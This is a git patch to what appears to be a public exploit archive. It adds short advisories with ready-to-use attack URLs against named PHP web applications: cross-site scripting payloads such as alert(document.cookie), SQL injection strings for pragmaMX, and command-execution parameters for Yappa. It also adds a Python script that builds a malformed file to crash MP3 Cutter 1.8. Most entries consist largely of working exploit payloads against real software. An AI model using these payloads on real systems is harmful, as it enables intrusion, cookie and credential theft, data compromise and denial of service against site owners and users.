From 7cbd3c3dffb7a40258a0a0ef9c5d370423fac28f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 9 Aug 2014 04:41:33 +0000 Subject: [PATCH] Updated 08_09_2014 --- files.csv | 9 ++++++ platforms/php/webapps/34280.txt | 15 ++++++++++ platforms/php/webapps/34282.txt | 9 ++++++ platforms/php/webapps/34283.txt | 7 +++++ platforms/php/webapps/34284.txt | 9 ++++++ platforms/php/webapps/34285.txt | 9 ++++++ platforms/php/webapps/34286.txt | 11 ++++++++ platforms/php/webapps/34287.txt | 10 +++++++ platforms/php/webapps/34288.txt | 13 +++++++++ platforms/windows/dos/34281.py | 49 +++++++++++++++++++++++++++++++++ 10 files changed, 141 insertions(+) create mode 100755 platforms/php/webapps/34280.txt create mode 100755 platforms/php/webapps/34282.txt create mode 100755 platforms/php/webapps/34283.txt create mode 100755 platforms/php/webapps/34284.txt create mode 100755 platforms/php/webapps/34285.txt create mode 100755 platforms/php/webapps/34286.txt create mode 100755 platforms/php/webapps/34287.txt create mode 100755 platforms/php/webapps/34288.txt create mode 100755 platforms/windows/dos/34281.py diff --git a/files.csv b/files.csv index 68266d51a..5427c961e 100755 --- a/files.csv +++ b/files.csv @@ -30871,3 +30871,12 @@ id,file,description,date,author,platform,type,port 34270,platforms/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter Integer Overflow and Array Indexing Overflow Vulnerabilities",2010-07-07,"Luigi Auriemma",multiple,dos,0 34271,platforms/multiple/remote/34271.txt,"id Software id Tech 4 Engine 'key' Packet Remote Code Execution Vulnerability",2010-07-05,"Luigi Auriemma",multiple,remote,0 34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x, 12.x - Kernel Pool Overflow",2014-08-05,"ryujin & sickness",windows,local,0 +34280,platforms/php/webapps/34280.txt,"PHPFABER CMS 2.0.5 Multiple Cross-Site Scripting Vulnerabilities",2010-07-04,prodigy,php,webapps,0 +34281,platforms/windows/dos/34281.py,"MP3 Cutter 1.8 MP3 File Processing Remote Denial of Service Vulnerability",2010-07-09,"Prashant Uniyal",windows,dos,0 +34282,platforms/php/webapps/34282.txt,"Real Estate Manager 1.0.1 'index.php' Cross-Site Scripting Vulnerability",2010-07-09,bi0,php,webapps,0 +34283,platforms/php/webapps/34283.txt,"Model Agency Manager 'search_process.php' Cross-Site Scripting Vulnerability",2009-12-13,bi0,php,webapps,0 +34284,platforms/php/webapps/34284.txt,"osCSS 1.2.2 'page' Parameter Cross Site Scripting Vulnerability",2010-07-08,"High-Tech Bridge SA",php,webapps,0 +34285,platforms/php/webapps/34285.txt,"ArticleMS 2.0 'c[]' Parameter Cross Site Scripting Vulnerability",2010-12-13,Packetdeath,php,webapps,0 +34286,platforms/php/webapps/34286.txt,"SimpNews 2.47.3 Multiple Cross Site Scripting Vulnerabilities",2010-07-09,MustLive,php,webapps,0 +34287,platforms/php/webapps/34287.txt,"Yappa 3.1.2 'yappa.php' Multiple Remote Command Execution Vulnerabilities",2010-07-09,"Sn!pEr.S!Te Hacker",php,webapps,0 +34288,platforms/php/webapps/34288.txt,"pragmaMX 0.1.11 'modules.php' Multiple SQL Injection Vulnerabilities",2009-12-22,"Hadi Kiamarsi",php,webapps,0 diff --git a/platforms/php/webapps/34280.txt b/platforms/php/webapps/34280.txt new file mode 100755 index 000000000..a2f142e5f --- /dev/null +++ b/platforms/php/webapps/34280.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/41498/info + +PHPFABER CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +PHPFABER CMS 2.0.5 is vulnerable; prior versions may also be affected. + +The following example URIs are available: + +http://www.example.com/cms/module.php?mod=Search&query=%3Cscript%3Ealert%280%29%3C/script%3E&stype=OR&go=++++Go!++++ + +http://www.example.com/cms/module.php/Products/%22%3E%3Cscript%3Ealert%280%29%3C/script%3E + +http://www.example.com/cms/cms_admin/index.php?mod=%3Cscript%3Ealert%280%29%3C/script%3E&action=setup \ No newline at end of file diff --git a/platforms/php/webapps/34282.txt b/platforms/php/webapps/34282.txt new file mode 100755 index 000000000..d3bef4c52 --- /dev/null +++ b/platforms/php/webapps/34282.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/41507/info + +Real Estate Manager is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Real Estate Manager 1.0.1 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?lang=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/34283.txt b/platforms/php/webapps/34283.txt new file mode 100755 index 000000000..f0e6ade6e --- /dev/null +++ b/platforms/php/webapps/34283.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/41509/info + +Model Agency Manager is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/search_process.php?searchtype="/> \ No newline at end of file diff --git a/platforms/php/webapps/34284.txt b/platforms/php/webapps/34284.txt new file mode 100755 index 000000000..6f41e77fb --- /dev/null +++ b/platforms/php/webapps/34284.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/41510/info + +osCSS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +osCSS version 1.2.2 is vulnerable; other versions may also be affected. + +http://www.example.com/admin/currencies.php?page=1">&cID=1 \ No newline at end of file diff --git a/platforms/php/webapps/34285.txt b/platforms/php/webapps/34285.txt new file mode 100755 index 000000000..6f7827ea4 --- /dev/null +++ b/platforms/php/webapps/34285.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/41511/info + +ArticleMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +ArticleMS 2.0 is vulnerable; other versions may also be affected. + +http://www.example.com/search/?a=search&q=PACKETDEATH&advanced=1&sortby=0&finddate=0&c[]=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/34286.txt b/platforms/php/webapps/34286.txt new file mode 100755 index 000000000..942f3029c --- /dev/null +++ b/platforms/php/webapps/34286.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/41517/info + +SimpNews is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +SimpNews 2.47.03 is vulnerable; other versions may also be affected. + +http://www.example.com/simpnews/news.php?layout=%3Cscript%3Ealert(document.cookie)%3C/script%3E +http://www.example.com/simpnews/news.php?lang=en&layout=layout2&sortorder=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E + diff --git a/platforms/php/webapps/34287.txt b/platforms/php/webapps/34287.txt new file mode 100755 index 000000000..b49564258 --- /dev/null +++ b/platforms/php/webapps/34287.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/41521/info + +Yappa (Yet Another PHP Photo Album) is prone to multiple remote command-execution vulnerabilities because it fails to properly validate user-supplied input. + +An attacker can exploit these issues to execute arbitrary commands within the context of the vulnerable system. + +Yappa 3.1.2 is vulnerable; other versions may also be affected. + +http://www.example.com/yappa/yappa.php?thedir=[ command you ] +http://www.example.com/yappa/yappa.php?image=[ command you] \ No newline at end of file diff --git a/platforms/php/webapps/34288.txt b/platforms/php/webapps/34288.txt new file mode 100755 index 000000000..4cf2f229e --- /dev/null +++ b/platforms/php/webapps/34288.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/41523/info + +pragmaMX is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +pragmaMX 0.1.11 is vulnerable; other versions may also be affected. + +http://www.example.com/modules.php?name=Your_Account&rop=showcontent"+and+31337-31337=0+--+&id=111-222-1933email@address.tst +http://www.example.com/modules.php?name=Your_Account&min=0&orderby=dateD"+and+31337-31337=0+--+&cid=0&jumpswitch=Switch +http://www.example.com/modules.php?name=Your_Account&op=pass_lost&query=111-222-1933email@address.tst&min=0'+and+31337-31337='0&orderby=dateD +http://www.example.com/modules.php?name=Your_Account&rop=showcontent&id=111-222-1933email@address.tst"+and+31337-31337="0 + diff --git a/platforms/windows/dos/34281.py b/platforms/windows/dos/34281.py new file mode 100755 index 000000000..181fb67a2 --- /dev/null +++ b/platforms/windows/dos/34281.py @@ -0,0 +1,49 @@ +source: http://www.securityfocus.com/bid/41506/info + +MP3 Cutter is prone to a remote denial-of-service vulnerability. + +An attacker can exploit this issue to cause an affected application to crash, denying service to legitimate users. + +MP3 Cutter 1.8 is vulnerable; other versions may also be affected. + +########################################################## +## Legion of Xtremers & Hackers Garage +## (www.loxian.co.cc) (www.garage4hackers.com) +## MP3 Cutter 1.8 Crash Exploit +## http://www.aivsoft.com/downloads/mp3cutter/download.html +## Author: Prashant a.k.a t3rm!n4t0r +## c0ntact: happyterminator@gmail.com +## +## Greetz to: vinnu, b0nd, fb1h2s, Anarki, Nikhil, D4RK3ST +######################################################### + +#exploit.py + +#MP3 cutter Crash Exploit + +print " MP3 Cutter Crash Exploit ( mp3 file ) \n" + +header1 = ( + "\x3C\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4F\x4E\x3D\x22\x33" + "\x2E\x30\x22\x3E\x0A\x0A\x3C\x45\x4E\x54\x52\x59\x3E\x3C\x54" + "\x49\x54\x4C\x45\x3E\x65\x78\x70\x6C\x6F\x69\x74\x3C\x2F\x54" + "\x49\x54\x4C\x45\x3E\x0A\x3C\x52\x45\x46\x20\x48\x52\x45\x46" + "\x3D\x22" + ) + +header2 = ( + "\x2E\x61\x73\x66\x22\x2F\x3E\x0A\x3C\x2F\x45\x4E\x54\x52\x59" + "\x3E\x3C\x2F\x41\x53\x58\x3E" + ) + +crash = "\x41" * 10000 + +exploit = header1 + crash + header2 + +try: + out_file = open("crash.mp3",'w') + out_file.write(exploit) + out_file.close() + raw_input("\nExploit file created!\n") +except: + print "Error" \ No newline at end of file